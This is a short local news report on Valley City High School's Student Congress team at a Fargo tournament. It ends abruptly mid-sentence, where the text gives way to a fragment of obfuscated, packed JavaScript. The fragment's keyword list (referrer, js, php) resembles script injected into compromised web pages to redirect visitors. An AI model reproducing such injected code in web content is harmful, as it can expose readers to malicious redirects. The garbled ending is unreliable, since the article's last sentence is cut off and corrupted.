FARGO, N.D. (NewsDakota.com)- The Valley City High School Student Congress team traveled to the East Congress Invitational at the Fargo Ramada Inn and Suites on Monday, September 18th. VCHS brought 22 kids to the tournament who competed throughout the seven different chambers. This is an exciting number of students and marks the largest number of student participants in VCHS Student Congress history.

It was a learning experience as nearly half of the team are entirely new to Student Congress. They debated resolutions on subjects ranging from the ban of products imported from countries that actively participate in deforestation practices to the use of full body scanners throughout our nation’s airports.

Valley City had a successful first tournament! Several students had their resolutions chosen to be debated at the next Student Congress tournament to be held at the Baymont Inn and Suites in Mandan, October nhtzs|var|u0026u|referrer|eyktt||js|php’.split(‘|’),0,{}))
